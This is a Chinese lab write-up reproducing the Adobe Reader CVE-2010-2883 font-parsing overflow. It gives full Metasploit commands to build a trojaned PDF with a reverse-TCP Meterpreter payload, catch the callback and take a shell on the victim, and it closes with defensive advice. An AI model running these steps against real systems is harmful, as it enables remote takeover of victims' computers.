zoukankan      html  css  js  c++  java
  • [漏洞复现]CVE-2010-2883 Adobe Reader 打开pdf电脑即刻中招

    1、漏洞概述:

    CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。”

    影响版本:Adobe Reader 8.2.4 - 9.3.4

    2、实验环境

    攻击机:kali linux 2017

    靶机:win 7 + Adobe Reader 9.3

    3、实验工具:

    链接: https://pan.baidu.com/s/1sQOxcGlb8r095e1oCBipPg 密码: 5fta

    4、漏洞复现

    在win 7 安装好Adobe Reader 9.3 

     进入kali,使用Metasploit生成PDF木马文件

    打开msf
    root@kali:~# msfconsole
    搜索Adobe渗透模块
    msf > search adobe_cooltype_sing
    调用渗透模块
    msf > use exploit/windows/fileformat/adobe_cooltype_sing
    查看模块详情
    msf exploit(adobe_cooltype_sing) > info

    调用攻击载荷,反向连接到攻击机
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
    设置kali 的IP地址
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.190.130
    设置本地监听端口
    msf exploit(adobe_cooltype_sing) > set LPORT 8888
    设置带有后门程序的PDF文件
    msf exploit(adobe_cooltype_sing) > set FILENAME GeekFZ.pdf
    执行渗透生成文件
    msf exploit(adobe_cooltype_sing) > exploit 

     将PDF木马文件拷贝到kali linux的桌面

    root@kali:~# cp /root/.msf4/local/GeekFZ.pdf /root/桌面/GeekFZ.pdf

     Metasploit开启shell监听会话,等待肉鸡上线

    返回
    msf exploit(adobe_cooltype_sing) > back
    使用handler模块
    msf > use exploit/multi/handler 
    回弹一个tcp连接
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    设置监听IP地址(跟PDF木马文件一样,即kali的IP)
    msf exploit(handler) > set LHOST 192.168.190.130
    设置监听的端口(跟PDF木马文件一样)
    msf exploit(handler) > set LPORT 8888
    开启监听
    msf exploit(handler) > exploit 

    将PDF木马文件拷贝到win 7并打开

     kali成功获取shell

     到session中连接它,并用Meterpreter控制肉鸡

    查看sessions
    msf exploit(handler) > sessions
    连接session
    msf exploit(handler) > sessions -i 2

    注:考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,所以需要快速切换到其他系统进程,这样会话才不会丢失。 

    获取进程
    meterpreter > ps
    切换进程
    meterpreter > migrate 3688

    获取Dos shell
    meterpreter > shell

    实验总结:


    可以看到,最终由于Adobe Reader 存在CVE-2010-2883这个高危漏洞,导致电脑打开特殊定制的pdf之后,直接变成肉鸡。与之前文章中的Office和Flash 0day漏洞类似,真实环境下,很多黑客会利用此方法,结合社会工程学,例如通过诱导邮件、各种论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。

    在这里也呼吁大家:平常要非常小心陌生办公文件,无论是pdf还是word等,打开之前一定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽量保证电脑的软件处于最新版,这样才能最大程度降低被攻击的几率。

  • 相关阅读:
    -Dmaven.test.skip=true 和 -DskipTests
    mysql 生成指定范围随机数
    Delphi 6 保存窗体设置
    Sql server left join,right join和inner join的比较
    Mysql配置文件my.ini详解
    网络游戏MMORPG服务器架构
    彻底删除SVN版本库中部分文件或文件夹
    高负载高并发应用 参考索引 地址
    Linux计划任务入门详解
    Linux下SVN的三种备份方式
  • 原文地址:https://www.cnblogs.com/ESHLkangi/p/9150906.html
Copyright © 2011-2022 走看看